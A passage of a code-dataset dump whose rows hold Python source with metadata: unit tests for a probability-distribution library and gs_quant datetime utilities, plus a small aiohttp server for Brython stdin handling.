hexsha stringlengths 40 40 | size int64 4 996k | ext stringclasses 8
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 245 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 245 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 245 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 4 996k | avg_line_length float64 1.33 58.2k | max_line_length int64 2 323k | alphanum_fraction float64 0 0.97 | content_no_comment stringlengths 0 946k | is_comment_constant_removed bool 2
classes | is_sharp_comment_removed bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f725d592ba2435c4281618ab5b9e73df3f162b9f | 4,779 | py | Python | tests/test_moments.py | nextBillyonair/DPM | 840ffaafe15c208b200b74094ffa8fe493b4c975 | [
"MIT"
] | 1 | 2021-07-20T14:02:55.000Z | 2021-07-20T14:02:55.000Z | tests/test_moments.py | nextBillyonair/DPM | 840ffaafe15c208b200b74094ffa8fe493b4c975 | [
"MIT"
] | null | null | null | tests/test_moments.py | nextBillyonair/DPM | 840ffaafe15c208b200b74094ffa8fe493b4c975 | [
"MIT"
] | null | null | null | import pytest
from dpm.distributions import *
import dpm.utils as utils
import torch
def test_arcsine():
model = Arcsine()
assert model.expectation == 0.5
assert model.median == 0.5
assert model.variance == 0.125
assert model.skewness == 0.
assert model.kurtosis == -1.5
model = Arcsine(-1, 1)
assert model.expectation == 0.
assert model.median == 0.
assert model.variance == 0.5
assert model.skewness == 0.
assert model.kurtosis == -1.5
def test_bernoulli():
model = Bernoulli(probs=[0.3])
assert model.logits.item() + 0.8473 < 1e-2
assert model.expectation.item() - 0.3 < 1e-2
assert model.variance.item() - 0.21 < 1e-2
assert model.skewness.item() - 1.9047619048 < 1e-2
assert model.kurtosis.item() + -1.2380952381 < 1e-2
def test_beta():
model = Beta()
assert model.expectation == 0.5
assert model.variance == 0.125
m = Beta(0.5, 0.5).mode.item()
assert m == 0. or 1.
assert Beta(4.5, 3.5).mode.item() - 0.5833333333 < 1e-2
assert Beta(1.5, 0.5).mode.item() == 1.
assert Beta(0.5, 1.5).mode.item() == 0.
# assert Beta(1.00000, 1.00000).mode.item() > 0. and Beta(1.00000, 1.00000).mode.item() < 1.
def test_cauchy():
model = Cauchy(loc=1.)
assert model.median == 1.
assert model.mode == 1.
def test_exponential():
model = Exponential()
assert model.expectation - 1. < 1e-2
assert model.mode - 0. < 1e-2
assert model.variance - 1. < 1e-2
assert model.median - 0.6931471806 < 1e-2
assert model.skewness - 2. < 1e-2
assert model.kurtosis - 6. < 1e-2
model = Exponential(0.5)
assert model.expectation - 2. < 1e-2
assert model.mode - 0. < 1e-2
assert model.variance - 4. < 1e-2
assert model.median - 1.3862943611 < 1e-2
assert model.skewness - 2. < 1e-2
assert model.kurtosis - 6. < 1e-2
def test_gamma():
model = Gamma()
assert model.expectation - 1. < 1e-2
assert model.variance - 1. < 1e-2
model = Gamma(0.5, 0.75)
assert model.expectation - 0.6666666667 < 1e-2
assert model.variance - 0.8888888889 < 1e-2
def test_gumbel():
model = Gumbel(loc=1., scale=2.)
assert model.expectation - (1 + 2 * utils.euler_mascheroni) < 1e-2
assert model.mode == 1.
assert model.median - 1.7330258412 < 1e-2
assert model.variance - 6.5797362674 < 1e-2
assert model.skewness - 1.14 < 1e-2
assert model.kurtosis - 2.4 < 1e-2
def test_hyperbolicsecant():
model = HyperbolicSecant()
assert model.expectation == 0.
assert model.variance == 1.
assert model.median == 0.
def test_laplace():
model = Laplace(loc=1., scale=2.)
assert model.expectation - 1. < 1e-2
assert model.variance - 8. < 1e-2
assert model.stddev - 2.8284271247 < 1e-2
assert model.median - 1. < 1e-2
assert model.mode - 1. < 1e-2
assert model.skewness < 1e-2
assert model.kurtosis - 3. < 1e-2
assert model.entropy() - 2.3862943611 < 1e-2
def test_log_cauchy():
model = LogCauchy(loc=2.)
assert model.median - 7.3890560989 < 1e-2
def test_log_normal():
model = LogNormal()
assert model.expectation - 1.6487212707 < 1e-2
assert model.variance - 4.6707742705 < 1e-2
assert model.mode - utils.e < 1e-2
assert model.median - utils.e < 1e-2
def test_logistic():
model = Logistic(loc=1., scale=2.)
assert model.expectation == 1.
assert model.mode == 1.
assert model.variance - 13.1594725348 < 1e-2
assert model.median == 1.
assert model.skewness == 0.
assert model.kurtosis == 1.2
def test_normal():
model = Normal(0., 3.)
assert model.variance.item() == 3.
assert model.expectation.item() == 0.
model = Normal([0., 0.], [3., 1., 1., 3.])
assert (model.variance - torch.tensor([[3., 1.], [1., 3.]]) < 1e-2).all()
assert (model.expectation == torch.tensor([0., 0.])).all()
def test_rayleigh():
model = Rayleigh(3.)
assert model.expectation - 3.7599424119 < 1e-2
assert model.mode - 3. < 1e-2
assert model.median - 3.5322300675 < 1e-2
assert model.variance - 3.8628330588 < 1e-2
assert model.skewness - 1.1186145158 < 1e-2
assert model.kurtosis - 0.2450893007 < 1e-2
def test_studentt():
model = StudentT()
model.expectation
model.variance
model.mode
def test_uniform():
model = Uniform()
assert model.expectation - 0.5 < 1e-2
assert model.variance - 1/12. < 1e-2
assert model.median - 0.5 < 1e-2
assert model.skewness == 0.
assert model.kurtosis + 1.2 < 1e-2
def test_logitnormal():
model = LogitNormal()
assert model.median - torch.sigmoid(torch.tensor(0.)) < 1e-2
model = LogitNormal(1.)
assert model.median - torch.sigmoid(torch.tensor(1.)) < 1e-2
# EOF
| 27.624277 | 96 | 0.628793 | import pytest
from dpm.distributions import *
import dpm.utils as utils
import torch
def test_arcsine():
model = Arcsine()
assert model.expectation == 0.5
assert model.median == 0.5
assert model.variance == 0.125
assert model.skewness == 0.
assert model.kurtosis == -1.5
model = Arcsine(-1, 1)
assert model.expectation == 0.
assert model.median == 0.
assert model.variance == 0.5
assert model.skewness == 0.
assert model.kurtosis == -1.5
def test_bernoulli():
model = Bernoulli(probs=[0.3])
assert model.logits.item() + 0.8473 < 1e-2
assert model.expectation.item() - 0.3 < 1e-2
assert model.variance.item() - 0.21 < 1e-2
assert model.skewness.item() - 1.9047619048 < 1e-2
assert model.kurtosis.item() + -1.2380952381 < 1e-2
def test_beta():
model = Beta()
assert model.expectation == 0.5
assert model.variance == 0.125
m = Beta(0.5, 0.5).mode.item()
assert m == 0. or 1.
assert Beta(4.5, 3.5).mode.item() - 0.5833333333 < 1e-2
assert Beta(1.5, 0.5).mode.item() == 1.
assert Beta(0.5, 1.5).mode.item() == 0.
def test_cauchy():
model = Cauchy(loc=1.)
assert model.median == 1.
assert model.mode == 1.
def test_exponential():
model = Exponential()
assert model.expectation - 1. < 1e-2
assert model.mode - 0. < 1e-2
assert model.variance - 1. < 1e-2
assert model.median - 0.6931471806 < 1e-2
assert model.skewness - 2. < 1e-2
assert model.kurtosis - 6. < 1e-2
model = Exponential(0.5)
assert model.expectation - 2. < 1e-2
assert model.mode - 0. < 1e-2
assert model.variance - 4. < 1e-2
assert model.median - 1.3862943611 < 1e-2
assert model.skewness - 2. < 1e-2
assert model.kurtosis - 6. < 1e-2
def test_gamma():
model = Gamma()
assert model.expectation - 1. < 1e-2
assert model.variance - 1. < 1e-2
model = Gamma(0.5, 0.75)
assert model.expectation - 0.6666666667 < 1e-2
assert model.variance - 0.8888888889 < 1e-2
def test_gumbel():
model = Gumbel(loc=1., scale=2.)
assert model.expectation - (1 + 2 * utils.euler_mascheroni) < 1e-2
assert model.mode == 1.
assert model.median - 1.7330258412 < 1e-2
assert model.variance - 6.5797362674 < 1e-2
assert model.skewness - 1.14 < 1e-2
assert model.kurtosis - 2.4 < 1e-2
def test_hyperbolicsecant():
model = HyperbolicSecant()
assert model.expectation == 0.
assert model.variance == 1.
assert model.median == 0.
def test_laplace():
model = Laplace(loc=1., scale=2.)
assert model.expectation - 1. < 1e-2
assert model.variance - 8. < 1e-2
assert model.stddev - 2.8284271247 < 1e-2
assert model.median - 1. < 1e-2
assert model.mode - 1. < 1e-2
assert model.skewness < 1e-2
assert model.kurtosis - 3. < 1e-2
assert model.entropy() - 2.3862943611 < 1e-2
def test_log_cauchy():
model = LogCauchy(loc=2.)
assert model.median - 7.3890560989 < 1e-2
def test_log_normal():
model = LogNormal()
assert model.expectation - 1.6487212707 < 1e-2
assert model.variance - 4.6707742705 < 1e-2
assert model.mode - utils.e < 1e-2
assert model.median - utils.e < 1e-2
def test_logistic():
model = Logistic(loc=1., scale=2.)
assert model.expectation == 1.
assert model.mode == 1.
assert model.variance - 13.1594725348 < 1e-2
assert model.median == 1.
assert model.skewness == 0.
assert model.kurtosis == 1.2
def test_normal():
model = Normal(0., 3.)
assert model.variance.item() == 3.
assert model.expectation.item() == 0.
model = Normal([0., 0.], [3., 1., 1., 3.])
assert (model.variance - torch.tensor([[3., 1.], [1., 3.]]) < 1e-2).all()
assert (model.expectation == torch.tensor([0., 0.])).all()
def test_rayleigh():
model = Rayleigh(3.)
assert model.expectation - 3.7599424119 < 1e-2
assert model.mode - 3. < 1e-2
assert model.median - 3.5322300675 < 1e-2
assert model.variance - 3.8628330588 < 1e-2
assert model.skewness - 1.1186145158 < 1e-2
assert model.kurtosis - 0.2450893007 < 1e-2
def test_studentt():
model = StudentT()
model.expectation
model.variance
model.mode
def test_uniform():
model = Uniform()
assert model.expectation - 0.5 < 1e-2
assert model.variance - 1/12. < 1e-2
assert model.median - 0.5 < 1e-2
assert model.skewness == 0.
assert model.kurtosis + 1.2 < 1e-2
def test_logitnormal():
model = LogitNormal()
assert model.median - torch.sigmoid(torch.tensor(0.)) < 1e-2
model = LogitNormal(1.)
assert model.median - torch.sigmoid(torch.tensor(1.)) < 1e-2
| true | true |
f725d77804443400285175fcae23883c61714c8f | 2,450 | py | Python | app.py | pythonpad/brython-runner-stdin-hanger | 8ee3b13fba3ff2eabbaf39835b6aa9bd7692589d | [
"MIT"
] | 1 | 2020-11-16T09:21:31.000Z | 2020-11-16T09:21:31.000Z | app.py | pythonpad/brython-runner-stdin-hanger | 8ee3b13fba3ff2eabbaf39835b6aa9bd7692589d | [
"MIT"
] | null | null | null | app.py | pythonpad/brython-runner-stdin-hanger | 8ee3b13fba3ff2eabbaf39835b6aa9bd7692589d | [
"MIT"
] | null | null | null | import asyncio
import sys
import random
import string
from aiohttp import web
def get_random_string(k=16):
return ''.join(random.choices(string.ascii_lowercase + string.digits, k=k))
class Handler:
def __init__(self):
self.store = {}
self.headers = {'Access-Control-Allow-Origin': '*'}
async def handle_sleep(self, request):
duration_param = request.rel_url.query['duration']
try:
duration = min(float(duration_param), 60)
await asyncio.sleep(duration)
return web.Response(text='%.2f' % duration, headers=self.headers)
except KeyboardInterrupt:
raise KeyboardInterrupt
except:
return web.Response(text='-1', headers=self.headers)
async def handle_open_slot(self, request):
while True:
key = get_random_string()
if key not in self.store:
self.store[key] = None
return web.Response(text=key, headers=self.headers)
async def handle_write_slot(self, request):
key = request.match_info.get('key')
data = await request.text()
if key in self.store:
self.store[key] = data
return web.Response(text=key, headers=self.headers)
else:
raise web.HTTPNotFound()
async def handle_read_slot(self, request):
key = request.match_info.get('key')
while True:
if key in self.store:
if self.store[key] is None:
await asyncio.sleep(1)
else:
data = self.store[key]
del self.store[key]
return web.Response(text=data, headers=self.headers)
else:
raise web.HTTPNotFound()
def main():
host = 'localhost'
port = '9095'
if len(sys.argv) > 1:
config = sys.argv[1]
if ':' in config:
host, port = config.split(':')
elif '.' in config:
host = config
else:
port = config
web.run_app(app, host=host, port=int(port))
handler = Handler()
app = web.Application()
app.add_routes([
web.get('/hanger/sleep/', handler.handle_sleep),
web.post('/hanger/open/', handler.handle_open_slot),
web.post('/hanger/{key}/write/', handler.handle_write_slot),
web.post('/hanger/{key}/read/', handler.handle_read_slot),
])
if __name__ == '__main__':
main() | 31.012658 | 79 | 0.579184 | import asyncio
import sys
import random
import string
from aiohttp import web
def get_random_string(k=16):
return ''.join(random.choices(string.ascii_lowercase + string.digits, k=k))
class Handler:
def __init__(self):
self.store = {}
self.headers = {'Access-Control-Allow-Origin': '*'}
async def handle_sleep(self, request):
duration_param = request.rel_url.query['duration']
try:
duration = min(float(duration_param), 60)
await asyncio.sleep(duration)
return web.Response(text='%.2f' % duration, headers=self.headers)
except KeyboardInterrupt:
raise KeyboardInterrupt
except:
return web.Response(text='-1', headers=self.headers)
async def handle_open_slot(self, request):
while True:
key = get_random_string()
if key not in self.store:
self.store[key] = None
return web.Response(text=key, headers=self.headers)
async def handle_write_slot(self, request):
key = request.match_info.get('key')
data = await request.text()
if key in self.store:
self.store[key] = data
return web.Response(text=key, headers=self.headers)
else:
raise web.HTTPNotFound()
async def handle_read_slot(self, request):
key = request.match_info.get('key')
while True:
if key in self.store:
if self.store[key] is None:
await asyncio.sleep(1)
else:
data = self.store[key]
del self.store[key]
return web.Response(text=data, headers=self.headers)
else:
raise web.HTTPNotFound()
def main():
host = 'localhost'
port = '9095'
if len(sys.argv) > 1:
config = sys.argv[1]
if ':' in config:
host, port = config.split(':')
elif '.' in config:
host = config
else:
port = config
web.run_app(app, host=host, port=int(port))
handler = Handler()
app = web.Application()
app.add_routes([
web.get('/hanger/sleep/', handler.handle_sleep),
web.post('/hanger/open/', handler.handle_open_slot),
web.post('/hanger/{key}/write/', handler.handle_write_slot),
web.post('/hanger/{key}/read/', handler.handle_read_slot),
])
if __name__ == '__main__':
main() | true | true |
f725d78e5277a65d26773130068149604e4a2536 | 15,850 | py | Python | gs_quant/test/timeseries/test_datetime.py | skyquant2/gs-quant | b7e648fa7912b13ad1fd503b643389e34587aa1e | [
"Apache-2.0"
] | 1 | 2021-06-28T06:43:42.000Z | 2021-06-28T06:43:42.000Z | gs_quant/test/timeseries/test_datetime.py | skyquant2/gs-quant | b7e648fa7912b13ad1fd503b643389e34587aa1e | [
"Apache-2.0"
] | null | null | null | gs_quant/test/timeseries/test_datetime.py | skyquant2/gs-quant | b7e648fa7912b13ad1fd503b643389e34587aa1e | [
"Apache-2.0"
] | null | null | null | """
Copyright 2018 Goldman Sachs.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
"""
import pytest
from pandas.testing import assert_series_equal
from gs_quant.timeseries.datetime import *
def test_align():
dates1 = [
date(2019, 1, 1),
date(2019, 1, 2),
date(2019, 1, 3),
date(2019, 1, 4),
date(2019, 1, 5),
]
dates2 = [
date(2019, 1, 2),
date(2019, 1, 4),
date(2019, 1, 6),
]
x = pd.Series([1.0, 2.0, 3.0, 4.0, 5.0], index=dates1)
y = pd.Series([20.0, 40.0, 60.0], index=dates2)
expectedl = pd.Series([2.0, 4.0], index=[date(2019, 1, 2), date(2019, 1, 4)])
expectedr = pd.Series([20.0, 40.0], index=[date(2019, 1, 2), date(2019, 1, 4)])
result = align(x, y, Interpolate.INTERSECT)
assert_series_equal(result[0], expectedl, obj="Align intersect left")
assert_series_equal(result[1], expectedr, obj="Align intersect left")
result = align(y, x, Interpolate.INTERSECT)
assert_series_equal(result[0], expectedr, obj="Align intersect right")
assert_series_equal(result[1], expectedl, obj="Align intersect right")
union_dates = [
date(2019, 1, 1),
date(2019, 1, 2),
date(2019, 1, 3),
date(2019, 1, 4),
date(2019, 1, 5),
date(2019, 1, 6),
]
expected1 = pd.Series([1.0, 2.0, 3.0, 4.0, 5.0, np.nan], index=union_dates)
expected2 = pd.Series([np.nan, 20.0, np.nan, 40.0, np.nan, 60.0], index=union_dates)
result = align(x, y, Interpolate.NAN)
assert_series_equal(result[0], expected1, obj="Align NaN left")
assert_series_equal(result[1], expected2, obj="Align NaN left")
result = align(y, x, Interpolate.NAN)
assert_series_equal(result[0], expected2, obj="Align NaN right")
assert_series_equal(result[1], expected1, obj="Align NaN right")
expected1 = pd.Series([1.0, 2.0, 3.0, 4.0, 5.0, 0.0], index=union_dates)
expected2 = pd.Series([0.0, 20.0, 0.0, 40.0, 0.0, 60.0], index=union_dates)
result = align(x, y, Interpolate.ZERO)
assert_series_equal(result[0], expected1, obj="Align zero left")
assert_series_equal(result[1], expected2, obj="Align zero left")
result = align(y, x, Interpolate.ZERO)
assert_series_equal(result[0], expected2, obj="Align zero right")
assert_series_equal(result[1], expected1, obj="Align zero right")
expected1 = pd.Series([1.0, 2.0, 3.0, 4.0, 5.0, 5.0], index=union_dates)
expected2 = pd.Series([20.0, 20.0, 20.0, 40.0, 40.0, 60.0], index=union_dates)
result = align(x, y, Interpolate.STEP)
assert_series_equal(result[0], expected1, obj="Align step left")
assert_series_equal(result[1], expected2, obj="Align step left")
result = align(y, x, Interpolate.STEP)
assert_series_equal(result[0], expected2, obj="Align step left")
assert_series_equal(result[1], expected1, obj="Align step left")
xp = x.copy()
yp = y.copy()
xp.index = pd.to_datetime(xp.index)
yp.index = pd.to_datetime(yp.index)
up = pd.to_datetime(union_dates)
expected1 = pd.Series([1.0, 2.0, 3.0, 4.0, 5.0, np.nan], index=up)
expected2 = pd.Series([np.nan, 20.0, 30.0, 40.0, 50.0, 60.0], index=up)
result = align(xp, yp, Interpolate.TIME)
assert_series_equal(result[0], expected1, obj="Align time left")
assert_series_equal(result[1], expected2, obj="Align time left")
result = align(yp, xp, Interpolate.TIME)
assert_series_equal(result[0], expected2, obj="Align time right")
assert_series_equal(result[1], expected1, obj="Align time right")
a = pd.Series([0, 100, 110], index=pd.DatetimeIndex(['2019-07-01', '2019-07-08', '2019-07-10']))
b = pd.Series([20, 60, 70], index=pd.DatetimeIndex(['2019-07-02', '2019-07-10', '2019-07-11']))
result = align(a, b, Interpolate.TIME)
u_index = a.index.union(b.index)
assert_series_equal(result[0], pd.Series([0, 100 / 7, 100, 110, np.nan], index=u_index))
assert_series_equal(result[1], pd.Series([np.nan, 20, 50, 60, 70], index=u_index))
result = align(x, 3)
assert_series_equal(result[0], x, obj="Align scalar left")
assert_series_equal(result[1], pd.Series(3, index=dates1), obj="Align scalar left")
result = align(3, x)
assert_series_equal(result[0], pd.Series(3, index=dates1), obj="Align scalar left")
assert_series_equal(result[1], x, obj="Align scalar right")
result = align(1, 2)
assert result[0] == 1
assert result[1] == 2
with pytest.raises(MqValueError):
align(x, x, "None")
def test_interpolate():
dates = [
date(2019, 1, 2),
date(2019, 1, 3),
date(2019, 1, 5),
date(2019, 1, 7),
]
x = pd.Series([2.0, 3.0, 5.0, 7.0], index=dates)
result = interpolate(x, dates)
assert_series_equal(result, x, obj="Interpolate series by dates")
result = interpolate(x, x)
assert_series_equal(result, x, obj="Interpolate series by series dates")
result = interpolate(x)
assert_series_equal(result, x, obj="Interpolate series default")
select_dates = [
date(2019, 1, 2),
date(2019, 1, 3),
date(2019, 1, 7),
]
result = interpolate(x, select_dates)
expected = pd.Series([2.0, 3.0, 7.0], index=select_dates)
assert_series_equal(result, expected, obj="Interpolate subset of dates")
select_dates = [
date(2019, 1, 1),
date(2019, 1, 2),
date(2019, 1, 4),
date(2019, 1, 5),
date(2019, 1, 6),
date(2019, 1, 7),
date(2019, 1, 8),
]
intersect_dates = [
date(2019, 1, 2),
date(2019, 1, 5),
date(2019, 1, 7),
]
result = interpolate(x, select_dates, Interpolate.INTERSECT)
expected = pd.Series([2.0, 5.0, 7.0], index=intersect_dates)
assert_series_equal(result, expected, obj="Interpolate intersect")
result = interpolate(x, select_dates, Interpolate.NAN)
expected = pd.Series([np.nan, 2.0, np.nan, 5.0, np.nan, 7.0, np.nan], index=select_dates)
assert_series_equal(result, expected, obj="Interpolate nan")
result = interpolate(x, select_dates, Interpolate.ZERO)
expected = pd.Series([0.0, 2.0, 0.0, 5.0, 0.0, 7.0, 0.0], index=select_dates)
assert_series_equal(result, expected, obj="Interpolate zero")
result = interpolate(x, select_dates, Interpolate.STEP)
expected = pd.Series([2.0, 2.0, 2.0, 5.0, 5.0, 7.0, 7.0], index=select_dates)
assert_series_equal(result, expected, obj="Interpolate step dates")
result = interpolate(x, pd.Series(np.nan, select_dates), Interpolate.STEP)
expected = pd.Series([2.0, 2.0, 2.0, 5.0, 5.0, 7.0, 7.0], index=select_dates)
assert_series_equal(result, expected, obj="Interpolate step series")
xnan = pd.Series([np.nan, 3.0, 5.0, 7.0], index=dates)
result = interpolate(xnan, select_dates, Interpolate.STEP)
expected = pd.Series([np.nan, np.nan, np.nan, 5.0, 5.0, 7.0, 7.0], index=select_dates)
assert_series_equal(result, expected, obj="Interpolate flat nan start")
x = pd.Series([2.0, 3.0, 5.0, 7.0], index=pd.DatetimeIndex(dates))
result = interpolate(x, select_dates, Interpolate.STEP)
expected = pd.Series([2.0, 2.0, 2.0, 5.0, 5.0, 7.0, 7.0], index=pd.DatetimeIndex(select_dates))
assert_series_equal(result, expected, obj="Interpolate step dates to series with timestamps")
with pytest.raises(MqValueError, match="Unknown intersection type: None"):
interpolate(x, x, "None")
with pytest.raises(MqValueError, match="Cannot perform step interpolation on an empty series"):
interpolate(pd.Series(), select_dates, Interpolate.STEP)
def test_value():
dates = [
date(2019, 1, 2),
date(2019, 1, 3),
date(2019, 1, 5),
date(2019, 1, 7),
]
x = pd.Series([2.0, 3.0, 5.0, 7.0], index=dates)
result = value(x, date(2019, 1, 3))
assert result == 3.0
result = value(x, date(2019, 1, 5))
assert result == 5.0
result = value(x, date(2019, 1, 4))
assert result == 3.0
result = value(x, date(2019, 1, 4), Interpolate.INTERSECT)
assert result is None
result = value(x, date(2019, 1, 4), Interpolate.STEP)
assert result == 3.0
result = value(x, date(2019, 1, 4), Interpolate.ZERO)
assert result == 0.0
result = value(x, date(2019, 1, 4), Interpolate.NAN)
assert np.isnan(result)
def test_day():
dates = [
date(2019, 1, 1),
date(2019, 1, 2),
date(2019, 1, 3),
date(2019, 1, 4),
]
x = pd.Series([1.0, 2.0, 3.0, 4.0], index=dates)
result = day(x)
expected = pd.Series([1, 2, 3, 4], index=dates)
assert_series_equal(result, expected, obj="Day")
def test_weekday():
dates = [
date(2019, 1, 7),
date(2019, 1, 8),
date(2019, 1, 9),
date(2019, 1, 10),
date(2019, 1, 11),
date(2019, 1, 12),
date(2019, 1, 13),
]
x = pd.Series([1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0], index=dates)
result = weekday(x)
expected = pd.Series([0, 1, 2, 3, 4, 5, 6], index=dates)
assert_series_equal(result, expected, obj="Weekday")
def test_month():
dates = [
date(2019, 1, 1),
date(2019, 2, 1),
date(2019, 3, 1),
date(2019, 4, 1),
]
x = pd.Series([1.0, 2.0, 3.0, 4.0], index=dates)
result = month(x)
expected = pd.Series([1, 2, 3, 4], index=dates)
assert_series_equal(result, expected, obj="Month")
def test_year():
dates = [
date(2019, 1, 1),
date(2020, 1, 2),
date(2021, 1, 3),
date(2022, 1, 4),
]
x = pd.Series([1.0, 2.0, 3.0, 4.0], index=dates)
result = year(x)
expected = pd.Series([2019, 2020, 2021, 2022], index=dates)
assert_series_equal(result, expected, obj="Year")
def test_quarter():
dates = [
date(2019, 1, 1),
date(2019, 4, 1),
date(2019, 7, 1),
date(2019, 10, 1),
]
x = pd.Series([1.0, 2.0, 3.0, 4.0], index=dates)
result = quarter(x)
expected = pd.Series([1, 2, 3, 4], index=dates)
assert_series_equal(result, expected, obj="Quarter")
def test_day_count_fractions():
dates = [
date(2019, 1, 1),
date(2019, 1, 2),
date(2019, 1, 3),
date(2019, 1, 4),
date(2019, 1, 5),
date(2019, 1, 6),
]
x = pd.Series([])
assert_series_equal(x, day_count_fractions(x))
x = pd.Series([100.0, 101, 103.02, 100.9596, 100.9596, 102.978792], index=dates)
result = day_count_fractions(x, DayCountConvention.ACTUAL_360)
result2 = day_count_fractions(x.index, DayCountConvention.ACTUAL_360)
dcf = 1 / 360
expected = pd.Series([np.NaN, dcf, dcf, dcf, dcf, dcf], index=dates)
assert_series_equal(result, expected, obj="ACT/360")
assert_series_equal(result2, expected, obj="ACT/360")
result = day_count_fractions(x, DayCountConvention.ACTUAL_365F)
dcf = 1 / 365
expected = pd.Series([np.NaN, dcf, dcf, dcf, dcf, dcf], index=dates)
assert_series_equal(result, expected, obj="ACT/365")
def test_date_range():
dates = [
date(2019, 1, 1),
date(2019, 1, 2),
date(2019, 1, 3),
date(2019, 1, 4),
date(2019, 1, 5),
date(2019, 1, 6),
]
values = [1.0, 2.0, 3.0, 4.0, 5.0, 7.0]
s0 = pd.Series(values, index=dates)
s1 = pd.Series(values, index=pd.date_range('2019-01-01', periods=6, freq='D'))
for x in [s0, s1]:
assert (date_range(x, 0, 0) == x).all()
assert (date_range(x, 0, 0, True) == x.iloc[:-2]).all()
assert date_range(x, 0, date(2019, 1, 3)).index[-1] == date(2019, 1, 3)
assert (date_range(x, 0, date(2019, 1, 3)) == x.iloc[:3]).all()
assert date_range(x, date(2019, 1, 3), date(2019, 1, 6)).index[0] == date(2019, 1, 3)
assert date_range(x, date(2019, 1, 3), date(2019, 1, 6)).index[-1] == date(2019, 1, 6)
assert (date_range(x, date(2019, 1, 3), date(2019, 1, 6)) == x.iloc[2:6]).all()
y = pd.Series(values, index=pd.date_range('2020-10-23', periods=6, freq='D'))
assert (date_range(y, 1, 1, True) == y.iloc[3:5]).all()
with pytest.raises(MqValueError):
date_range(pd.Series([1]), 0, 0)
with pytest.raises(MqTypeError):
date_range(pd.Series([1]), 0, 0, 'string')
def test_prepend():
x = pd.Series([1.0, 2.0, 3.0, 4.0, 5.0, 7.0], index=pd.date_range('2019-01-01', "2019-01-06"))
y = pd.Series([3.1, 4.1, 5.1], index=pd.date_range('2019-01-03', '2019-01-05'))
assert_series_equal(prepend([]), pd.Series(dtype='float64'), obj='prepend empty')
assert_series_equal(prepend([x]), x, obj='prepend one series')
actual = prepend([x, y])
expected = pd.Series([1.0, 2.0, 3.1, 4.1, 5.1], index=pd.date_range('2019-01-01', '2019-01-05'))
assert_series_equal(actual, expected, obj='prepend two series')
x = pd.Series([1.0, 2.0, 3.0, 4.0, 5.0, 7.0], index=pd.date_range('2019-01-01', periods=6, freq='H'))
y = pd.Series([3.1, 4.1, 5.1], index=pd.date_range('2019-01-01 02:00', periods=3, freq='H'))
actual = prepend([x, y])
expected = pd.Series([1.0, 2.0, 3.1, 4.1, 5.1], index=pd.date_range('2019-01-01', periods=5, freq='H'))
assert_series_equal(actual, expected, obj='prepend two real-time series')
def test_union():
x = pd.Series([3.1, 4.1, np.nan], index=pd.date_range('2019-01-03', '2019-01-05'))
y = pd.Series([1.0, np.nan, 3.0, 4.0, 5.0, 6.0], index=pd.date_range('2019-01-01', "2019-01-06"))
z = pd.Series([60.0, 70.0], index=pd.date_range('2019-01-06', "2019-01-07"))
assert_series_equal(union([]), pd.Series(dtype='float64'), obj='union empty')
x.index.freq = None
assert_series_equal(union([x]), x, obj='union of one series')
actual = union([x, y, z])
expected = pd.Series([1.0, np.nan, 3.1, 4.1, 5.0, 6.0, 70], index=pd.date_range('2019-01-01', '2019-01-07'))
assert_series_equal(actual, expected, obj='union of three series')
x = pd.Series([3.1, 4.1, np.nan], index=pd.date_range('2019-01-01 02:00', periods=3, freq='H'))
y = pd.Series([1.0, np.nan, 3.0, 4.0, 5.0, 6.0], index=pd.date_range('2019-01-01', periods=6, freq='H'))
actual = union([x, y])
expected = pd.Series([1.0, np.nan, 3.1, 4.1, 5.0, 6.0], index=pd.date_range('2019-01-01', periods=6, freq='H'))
assert_series_equal(actual, expected, obj='union of two real-time series')
def test_bucketize():
dates = pd.bdate_range(start='1/1/2021', end='4/23/2021')
series = pd.Series(range(len(dates)), index=dates)
actual = bucketize(series, AggregateFunction.MAX, AggregatePeriod.MONTH)
expected_index = pd.DatetimeIndex([date(2021, 1, 31), date(2021, 2, 28), date(2021, 3, 31), date(2021, 4, 30)])
expected = pd.Series([20, 40, 63, 80], index=expected_index)
actual.index.freq = None # Ignore the index freq
assert_series_equal(actual, expected, check_index_type=False)
def test_day_count():
assert day_count(datetime.date(2021, 5, 7), datetime.date(2021, 5, 10)) == 1
assert day_count(datetime.date(2021, 5, 10), datetime.date(2021, 5, 14)) == 4
assert day_count(datetime.date(2021, 5, 10), datetime.date(2021, 5, 17)) == 5
with pytest.raises(MqValueError):
day_count(datetime.date(2021, 5, 7), '2021-05-10')
if __name__ == "__main__":
pytest.main(args=["test_datetime.py"])
| 34.835165 | 115 | 0.617603 |
import pytest
from pandas.testing import assert_series_equal
from gs_quant.timeseries.datetime import *
def test_align():
dates1 = [
date(2019, 1, 1),
date(2019, 1, 2),
date(2019, 1, 3),
date(2019, 1, 4),
date(2019, 1, 5),
]
dates2 = [
date(2019, 1, 2),
date(2019, 1, 4),
date(2019, 1, 6),
]
x = pd.Series([1.0, 2.0, 3.0, 4.0, 5.0], index=dates1)
y = pd.Series([20.0, 40.0, 60.0], index=dates2)
